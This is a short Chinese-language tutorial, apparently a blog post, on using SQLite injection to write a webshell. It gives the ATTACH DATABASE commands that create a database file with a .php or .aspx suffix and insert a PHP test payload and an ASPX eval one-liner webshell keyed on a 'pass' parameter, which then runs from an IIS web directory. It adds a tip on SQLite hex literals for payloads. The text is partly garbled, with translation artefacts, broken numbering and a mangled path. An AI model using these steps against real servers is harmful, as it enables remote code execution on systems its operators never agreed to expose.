SQLite的扫盲
-
SQLite的是一种嵌入式数据库,它的数据库就是一个文件。由于SQLite的本身是Ç写的,而且体积很小,所以经常被集成到各种应用程序中,主要在手机的应用中使用。
-
之前没有遇到过关于SQLite的的注入,这次遇到一个在ASPX中使用的SQLite数据库,并且存在注入。
-
SQLite的一个重要的特性是零配置的,这意味着不需要复杂的安装或管理。
-
SQLite的的语法和其他数据库差不多,只不过的SQLite的数据库是一个单独的文件.SQLite创建数据库的方法有两种,一种是创建,另外一种是附加。
-
创建使用命令:sqlite3.exe 数据库文件名。例如创建一个名字为aa.db的数据库,使用命令:sqlite3.exe aa.db。
-
例如附加一个bb.db的数据库,别名为a,命令为:attach database 'd:sqliteb.db' as 'a';。
-
创建表并插入数据的命令如下:
create table a.tt(dataz text); INSERT into a.tt(dataz) VALUES ('test');
-
SQLite还可以生成任意后缀名的数据库文件。例如创建一个php结尾的数据库文件,新建一个名为exp的表,并在其中插入数据,内容为:
<?php phpinfo();?>
。
具体命令:
```sqlite>ATTACH DATABASE 'd:\sqlite\23.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();?>');--
9. 同样的方法生成aspx后缀的数据库文件,创建表,并插入<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>。然后将该文件放在IIS服务的web目录。发现其中的APSX代码也会被解析。
10. 通过以上的测试过程和实际利用,可以归纳两点:
11. SQLite可以创建任意格式的数据库文件,并且插入的代码可以根据文件格式来解析,这就造成了可以利用这种方式写WEBSHELL的原因。
2.SQLite中十六进制的写法为:x'....',而不是0x....。
参考:```https://fuping.site/2017/07/19/SQLite-Injection-Get-WebShell/```